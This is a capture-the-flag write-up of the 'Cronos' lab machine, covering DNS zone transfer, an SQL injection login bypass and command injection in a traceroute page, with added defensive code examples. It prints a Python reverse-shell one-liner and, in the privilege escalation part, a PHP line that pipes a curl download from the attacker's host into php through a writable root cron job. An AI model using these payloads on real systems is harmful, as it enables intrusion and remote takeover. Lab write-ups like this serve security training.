i. Port Scan
Navigating to the host in the browser:
Default Apache page…
Running a gobuster:
In the port scan, we saw DNS open. Let’s see if we can find any information:
We got a domain: cronos.htb. Let’s add it to our hosts file and attempt to browse to it:
Running a gobuster scan:
Once again, another dead end…
Let’s attempt a zone transfer (AXFR) against the target’s nameserver and see what kind of information we get:
admin.cronos.htb looks very promising… Let’s add it to /etc/hosts as well and navigate to it:
A login page. Let’s attempt to bypass it using SQLi:
admin' or '1'='1
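Why that payload works, as an added example (not code from the original writeup or from the box): the login query is built by pasting the username straight into the SQL text, so `admin' or '1'='1` turns the WHERE clause into `username = 'admin' OR ('1'='1' AND password = '…')`, and since AND binds tighter than OR the admin row matches whatever the password is. The table, the credential and the sha256 stand-in for password hashing are all constructed for the demo; the parameterised version beside it is the fix.

```python
import hashlib
import sqlite3


def make_db():
    """Constructed in-memory users table. The admin credential is made up and
    sha256 only stands in for the app's real password hashing (a production
    app would use bcrypt/argon2); the point here is the query, not the hash."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)",
                 ("admin", hashlib.sha256(b"demo-password").hexdigest()))
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """String-built query: the username is spliced into the SQL verbatim, so a
    quote in the input closes the literal and the rest is parsed as SQL.
    With username = "admin' or '1'='1" the clause becomes
        username = 'admin' OR ('1'='1' AND password = '<hash>')
    which is true for the admin row regardless of the password."""
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    query = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
             % (username, pw_hash))
    return conn.execute(query).fetchone() is not None


def login_safe(conn, username, password):
    """Parameterised query: the driver sends the username as a bound value,
    so the quote and the OR stay inside the string and never reach the parser."""
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, pw_hash)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    payload = "admin' or '1'='1"
    print("vulnerable login with payload:", login_vulnerable(db, payload, "anything"))  # True
    print("parameterised login with payload:", login_safe(db, payload, "anything"))     # False
```

The vulnerable function still rejects a plain wrong password for `admin`; it is only the quote-breaking input that slips through, which is why a quick `'` in the username field is the usual first probe.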
Looks like we can run traceroute and see the output in the browser.
Let’s see if it’s vulnerable to command injection:
We have command injection!
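The bug behind this, and the hardened form a developer should have written, as an added example that is not part of the original writeup: the page's traceroute feature behaves like a handler that concatenates the submitted host into a shell command, so `127.0.0.1; id` runs two commands. The fix is an allow-list check (IP address or plain hostname, nothing else) plus passing the value as a single argv element with no shell. The parameter name `host` and the PHP `system()` shape are assumptions about the app, not taken from the page.

```python
import ipaddress
import re
import subprocess

# Hostname grammar (RFC 1123 style): labels of letters, digits and hyphens,
# no leading/trailing hyphen, 63 chars per label, 253 overall. \Z (not $) so
# a trailing newline cannot sneak past the check.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOSTNAME_RE = re.compile(r"(?=.{1,253}\Z)" + _LABEL + r"(?:\." + _LABEL + r")*\Z")


def vulnerable_command(target):
    """The shape of the bug: user input pasted into a shell command string.
    Equivalent to a PHP handler doing system("traceroute " . $_POST["host"])
    (parameter name assumed). Once a shell parses it, ';' '|' '`' '$()' all work."""
    return "traceroute " + target


def validate_target(target):
    """Allow-list check: return the target if it is an IP address or a plain
    hostname, otherwise raise. Shell metacharacters cannot pass because the
    grammar only admits [A-Za-z0-9.-] (plus ':' inside IPv6 literals), and a
    leading '-' is rejected too, which also blocks option injection."""
    try:
        return str(ipaddress.ip_address(target))
    except ValueError:
        pass
    if HOSTNAME_RE.fullmatch(target):
        return target
    raise ValueError("invalid traceroute target: %r" % (target,))


def traceroute_argv(target):
    """Argument vector for the hardened handler: validated input passed as one
    argv element with shell=False, so no shell ever interprets it."""
    return ["traceroute", validate_target(target)]


def run_traceroute(target, timeout=30):
    """Run the hardened command and return its stdout (needs traceroute installed)."""
    result = subprocess.run(traceroute_argv(target), capture_output=True,
                            text=True, timeout=timeout, check=False)
    return result.stdout


if __name__ == "__main__":
    print(vulnerable_command("127.0.0.1; id"))  # two commands once a shell sees it
    for candidate in ("127.0.0.1; id", "$(id)", "`id`", "cronos.htb|id", "-I", "10.10.10.14"):
        try:
            print("accepted:", traceroute_argv(candidate))
        except ValueError as exc:
            print("rejected:", exc)
```

Escaping the input for the shell (`escapeshellarg` and friends) is the weaker alternative: it keeps the shell in the path and still allows option injection, which is why the argv form with an allow-list is preferred.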
To get a shell, I’m going to use a Python reverse shell one-liner (from the pentestmonkey cheat sheet, http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet, with the listener address and port adjusted to suit):
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Looking at our listener:
iii. Privilege Escalation
Based on the name of the machine, and after not having much luck enumerating, let’s focus on cron.
The last line seems interesting… seems like artisan is being executed by root.
Let’s look at the permissions of the artisan file:
We own the file and are able to write to it.
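The check above, generalised, as an added example that is not part of the original writeup: parse a system crontab, keep the jobs that run as root, pull every absolute path out of each command (arguments included, since `php /path/artisan` executes the argument, not just the interpreter) and report the ones the current user can write. The crontab text and its paths are constructed for the demo and are not the box’s; the `is_writable` hook exists so the logic can be run against that sample without touching the filesystem.

```python
import os
import re
import shlex

# Constructed sample in /etc/crontab format (five time fields, user, command).
# The jobs and paths are illustrative and are not taken from the box.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 *  * * *  root  cd / && run-parts --report /etc/cron.hourly
* * * * *    root  php /var/www/app/artisan schedule:run >> /dev/null 2>&1
*/5 * * * *  www-data  /usr/local/bin/cleanup.sh
"""

ABS_PATH = re.compile(r"/[\w./-]+\Z")


def parse_system_crontab(text):
    """Return (user, command) for each job line, skipping blanks, comments and
    KEY=VALUE environment lines. Handles 5-field and @reboot-style schedules."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"\w+=", line):
            continue
        if line.startswith("@"):
            fields = line.split(None, 2)
            if len(fields) == 3:
                jobs.append((fields[1], fields[2]))
        else:
            fields = line.split(None, 6)
            if len(fields) == 7:
                jobs.append((fields[5], fields[6]))
    return jobs


def command_paths(command):
    """Absolute paths anywhere in the command, arguments included. Redirection
    targets such as /dev/null are dropped. Directories are kept on purpose:
    a writable directory handed to run-parts is just as useful as a script."""
    try:
        tokens = shlex.split(command)
    except ValueError:  # unbalanced quotes; fall back to a plain split
        tokens = command.split()
    return [t for t in tokens if ABS_PATH.fullmatch(t) and t != "/dev/null"]


def find_writable_root_jobs(crontab_text, is_writable=None):
    """Return (path, command) for every root-run job whose command references
    a file or directory the current user can write. The default check asks
    the real filesystem; pass a predicate to run against constructed data."""
    if is_writable is None:
        def is_writable(path):
            return os.access(path, os.W_OK)
    hits = []
    for user, command in parse_system_crontab(crontab_text):
        if user != "root":
            continue
        for path in command_paths(command):
            if is_writable(path):
                hits.append((path, command))
    return hits


if __name__ == "__main__":
    # Dry run on the constructed sample, pretending the artisan file is writable
    pretend = {"/var/www/app/artisan"}
    print(find_writable_root_jobs(SAMPLE_CRONTAB, is_writable=pretend.__contains__))
    # Real run on a target, if its system crontab is readable
    if os.path.isfile("/etc/crontab"):
        with open("/etc/crontab") as f:
            print(find_writable_root_jobs(f.read()))
```

On a real target the same loop is worth pointing at /etc/cron.d/* and the cron.{hourly,daily,weekly,monthly} directories too; the parser above only knows the system crontab layout with a user field, so per-user crontabs (no user column) need the split adjusted.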
Writing the following into artisan:
<?php system('curl http://10.10.10.14/rev.php | php') ?>
This will download the PHP reverse shell from my host and pipe it into php to execute. PHP reverse shell: http://pentestmonkey.net/tools/web-shells/php-reverse-shell
Waiting a couple of seconds, and looking at our listener:
This box was a great refresher/practice for DNS.
Thanks for reading.
Sources / Links:
https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet